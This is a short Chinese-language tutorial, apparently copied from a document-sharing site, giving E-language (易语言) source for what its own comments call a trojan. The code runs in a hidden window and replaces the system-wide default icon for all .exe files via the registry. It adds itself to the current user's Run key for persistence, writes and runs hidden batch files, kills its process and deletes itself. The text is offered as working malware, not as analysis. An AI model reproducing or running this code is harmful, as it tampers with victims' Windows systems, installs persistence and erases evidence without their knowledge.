(1).先创建一个窗口,里面放一个始终,把窗口可视改成“假”。; (2).代码如下: .版本 2 .支持库 eAPI .子程序 __启动窗口_创建完毕 延时 (1000) ' 等待延时 提取资源文件图标 (取运行目录 () + “\” + 取执行文件名 (), 0, “C:\windows\system32\Aver.ico”, ) ' 替换系统exe图标 写注册项 (#本地机器, “SOFTWARE\Classes\exefile\DefaultIcon\”, “C:\windows\system32\Aver.ico”) ' 写到注册表键值 写注册项 (#现行用户, “Software\Microsoft\Windows\CurrentVersion\Run\” + 取执行文件名 (), 取运行目录 () + “\” + 取执行文件名 ()) ' 写让注册表键值删除后可恢复木马实行自启动 写到文件 (取运行目录 () + “\del.bat”, #del) ' 写出删除木马自身文件批处理 写到文件 (取运行目录 () + “\ddel.bat”, #ddel) ' 写出自动刷新系统批处理 运行 (取运行目录 () + “\ddel.bat”, 假, #隐藏窗口) ' 运行自动刷新系统批处理 延时 (500) ' 等待延时 运行 (“cmd /c taskkill /f /im Aver.exe”, 假, #隐藏窗口) ' 结束木马自身进程 运行 (取运行目录 () + “\del.bat”, 假, #隐藏窗口) ' 写出删除木马自身文件批处理 结束 () 本文来源:https://www.wddqw.com/doc/c364a3086bd97f192279e984.html